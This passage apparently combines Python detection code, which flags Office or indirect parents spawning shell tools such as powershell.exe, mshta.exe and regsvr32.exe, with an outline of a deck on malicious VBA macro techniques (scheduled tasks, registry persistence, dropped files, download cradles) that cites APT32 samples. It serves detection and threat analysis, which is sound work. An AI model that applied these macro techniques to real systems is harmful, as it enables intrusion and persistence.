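SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "regsvr32.exe", "dllhost.exe"}
# Parents the deck lists as substitutes for the Office process
INDIRECT_PARENTS = {"wmiprvse.exe": "wmi-spawn", "svchost.exe": "scheduled-task",
                    "explorer.exe": "shell-com-or-ppid-spoof"}

@dataclass
class ProcEvent:            # assumed event shape (Sysmon-like), constructed for this demo
    ts: datetime
    host: str
    image: str              # path of the new process
    parent_image: str       # path of the parent as reported (may be spoofed)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events, window=timedelta(seconds=120)):
    """Return (severity, reason, event) tuples, oldest first."""
    office_starts = {}      # host -> timestamps at which an Office app started
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        img, parent = basename(ev.image), basename(ev.parent_image)
        if img in OFFICE_APPS:
            office_starts.setdefault(ev.host, []).append(ev.ts)
            continue
        # Was an Office app started on this host shortly before this event?
        office_recent = any(timedelta(0) <= ev.ts - t <= window
                            for t in office_starts.get(ev.host, []))
        if parent in OFFICE_APPS:
            alerts.append(("high", "office-parent", ev))   # the typical method
        elif parent in INDIRECT_PARENTS and img in SUSPICIOUS_CHILDREN:
            if parent == "explorer.exe" and not office_recent:
                continue    # explorer.exe launching programs is normal user activity
            alerts.append(("high" if office_recent else "medium",
                           INDIRECT_PARENTS[parent], ev))
    return alerts

def sample_events():
    """Constructed records, not real telemetry."""
    t0, s = datetime(2019, 9, 16, 10, 0, 0), timedelta(seconds=1)
    sys32 = "C:\\Windows\\System32\\"
    word = "C:\\Program Files\\Microsoft Office\\WINWORD.EXE"
    return [
        ProcEvent(t0, "host1", word, sys32 + "explorer.exe"),                  # document opened
        ProcEvent(t0 + 5 * s, "host1", sys32 + "cmd.exe", word),               # direct Office child
        ProcEvent(t0 + 30 * s, "host1", sys32 + "powershell.exe", sys32 + "wbem\\WmiPrvSE.exe"),
        ProcEvent(t0 + 40 * s, "host2", sys32 + "powershell.exe", sys32 + "wbem\\WmiPrvSE.exe"),
        ProcEvent(t0 + 50 * s, "host1", sys32 + "wscript.exe", sys32 + "svchost.exe"),
        ProcEvent(t0 + 60 * s, "host1", sys32 + "dllhost.exe", sys32 + "explorer.exe"),
        ProcEvent(t0 + 900 * s, "host1", sys32 + "cmd.exe", sys32 + "explorer.exe"),  # user shell
    ]
```

Start events alone are a rough proxy for "an Office app is running"; a real pipeline would track process lifetime and feed the medium-severity hits into a hunting queue rather than paging on them.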
  • 25. Scheduled Task Creation
  • 26. • VBScript lets us create Scheduled Tasks, which can be abused so that execution is no longer tied to activity from Office (svchost.exe will spawn the task). – Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger-example--scripting-
  • 27. Sample in the wild https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14
  • 28. Extract the VBA macro code
  • 29. Sub Document_Open()
  • 30. Sub Document_Close()
  • 31. A sample of APT32 (aka OceanLotus) https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876
  • 36. Registry Modification
  • 37. • VBScript also allows access to the registry, allowing payloads to be stored, settings to be modified, and persistence entries to be created directly from a macro (using WMI or WScript). – Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--registry
  • 38. Wild wild west https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
  • 39. Extract the VBA macro code
  • 41. Write the 1st decoded base64 blob to "C:\ProgramData\WindowsDefender.ini"
  • 42. Write the 2nd decoded base64 blob to "C:\ProgramData\Defender.sct"
  • 43. Write the 3rd decoded base64 blob to "C:\ProgramData\DefenderService.inf"
  • 44. LOLBin (Living Off The Land)
  • 46. Another #OceanLotus sample https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
  • 47. VBA code
  • 48. Dropping Files
  • 49. • Dropping files has its pros and cons. Making changes to disk often means payloads get analyzed by antivirus and leave forensic artefacts. Yet in most breaches attackers still use payloads dropped to disk, because of the convenience and ease of having a solid foothold in a network. • In VBScript we can make use of the FileSystemObject to drop files.
  • 50. Again, another sample of #OceanLotus… https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
  • 51. VBA code…
  • 52. Dropping the DLL file
  • 53. Another sample https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
  • 54. VBA code – get the base64 data
  • 55. VBA code – decode the base64 and execute the payload
  • 56. Download file
  • 57. • There are multiple ways VBScript can be used to download content. This content can then be dropped to disk, inserted into the registry or injected into memory. • One of the most common and simplest methods is using the XMLHTTP library along with ADODB to write the response to a file. • Another option is a direct API call; for example, a simple VBScript download cradle can be implemented using URLDownloadToFileA.
  • 58. Some sample code
  • 60. Extract the VBA code
  • 61. Extract the VBA code
  • 64. VBA code
  • 66. End!